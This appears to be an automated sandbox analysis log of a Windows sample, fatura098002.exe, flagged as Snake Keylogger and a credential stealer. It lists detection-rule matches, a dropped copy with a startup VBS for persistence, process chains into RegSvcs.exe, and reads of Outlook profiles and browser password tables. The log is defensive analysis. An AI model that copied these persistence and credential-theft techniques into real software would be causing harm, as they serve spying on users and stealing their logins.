Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0070CAF0	0_2_0070CAF0
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0072CAA0	0_2_0072CAA0
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0071CC39	0_2_0071CC39
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00736DD9	0_2_00736DD9
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0071B119	0_2_0071B119
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007091C0	0_2_007091C0
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00721394	0_2_00721394
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00721706	0_2_00721706
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0072781B	0_2_0072781B
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0071997D	0_2_0071997D
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00707920	0_2_00707920
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007219B0	0_2_007219B0
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00727A4A	0_2_00727A4A
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00721C77	0_2_00721C77
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00727CA7	0_2_00727CA7
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0078BE44	0_2_0078BE44
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00739EEE	0_2_00739EEE
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0070BF40	0_2_0070BF40
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00721F32	0_2_00721F32
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00FD2928	0_2_00FD2928
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00648060	2_2_00648060
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006B2046	2_2_006B2046
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006A8298	2_2_006A8298
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0067E4FF	2_2_0067E4FF
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0067676B	2_2_0067676B
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D4873	2_2_006D4873
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0064CAF0	2_2_0064CAF0
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0066CAA0	2_2_0066CAA0
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0065CC39	2_2_0065CC39
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00676DD9	2_2_00676DD9
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0065D064	2_2_0065D064
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0065B119	2_2_0065B119
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006491C0	2_2_006491C0
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00661394	2_2_00661394
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00661706	2_2_00661706
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0066781B	2_2_0066781B
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0065997D	2_2_0065997D
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00647920	2_2_00647920
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006619B0	2_2_006619B0
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00667A4A	2_2_00667A4A
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00661C77	2_2_00661C77
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00667CA7	2_2_00667CA7
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006CBE44	2_2_006CBE44
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00679EEE	2_2_00679EEE
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0064BF40	2_2_0064BF40
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00661F32	2_2_00661F32
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00EB23D0	2_2_00EB23D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_028BC530	3_2_028BC530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_028B9480	3_2_028B9480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_028B27B9	3_2_028B27B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_028BC521	3_2_028BC521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_028B2DDF	3_2_028B2DDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_028B946F	3_2_028B946F
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 5_2_00DF2388	5_2_00DF2388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00F9C530	6_2_00F9C530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00F99480	6_2_00F99480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00F9C521	6_2_00F9C521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00F92DD1	6_2_00F92DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00F9946F	6_2_00F9946F

Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: String function: 00649CB3 appears 31 times
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: String function: 00660A30 appears 46 times
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: String function: 0065F9F2 appears 40 times
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: String function: 0071F9F2 appears 40 times
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: String function: 00720A30 appears 46 times
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: String function: 00709CB3 appears 31 times

Source: fatura098002.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.gehlenite.exe.5a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.gehlenite.exe.5a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.gehlenite.exe.1b80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.gehlenite.exe.1b80000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.gehlenite.exe.5a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.gehlenite.exe.5a0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.2652141073.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: gehlenite.exe PID: 7584, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7624, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: gehlenite.exe PID: 7840, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.gehlenite.exe.5a0000.0.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.gehlenite.exe.5a0000.0.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/3@2/2

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_007737B5 GetLastError,FormatMessageW,

0_2_007737B5

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007610BF AdjustTokenPrivileges,CloseHandle,	0_2_007610BF
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007616C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_007616C3
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006A10BF AdjustTokenPrivileges,CloseHandle,	2_2_006A10BF
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_006A16C3

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_007751CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_007751CD

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_0078A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0078A67C

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_0077648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0077648E

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_007042A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_007042A2

Source: C:\Users\user\Desktop\fatura098002.exe

File created: C:\Users\user\AppData\Local\Halitherses

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\fatura098002.exe

File created: C:\Users\user\AppData\Local\Temp\ageless

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\fatura098002.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2653936618.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2653936618.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2653936618.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2653936618.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002B4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2654390949.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: fatura098002.exe	Virustotal: Detection: 54%
Source: fatura098002.exe	ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\fatura098002.exe

File read: C:\Users\user\Desktop\fatura098002.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\fatura098002.exe "C:\Users\user\Desktop\fatura098002.exe"
Source: C:\Users\user\Desktop\fatura098002.exe	Process created: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe "C:\Users\user\Desktop\fatura098002.exe"
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\fatura098002.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe "C:\Users\user\AppData\Local\Halitherses\gehlenite.exe"
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Halitherses\gehlenite.exe"
Source: C:\Users\user\Desktop\fatura098002.exe	Process created: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe "C:\Users\user\Desktop\fatura098002.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\fatura098002.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe "C:\Users\user\AppData\Local\Halitherses\gehlenite.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Halitherses\gehlenite.exe"	Jump to behavior

Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\fatura098002.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

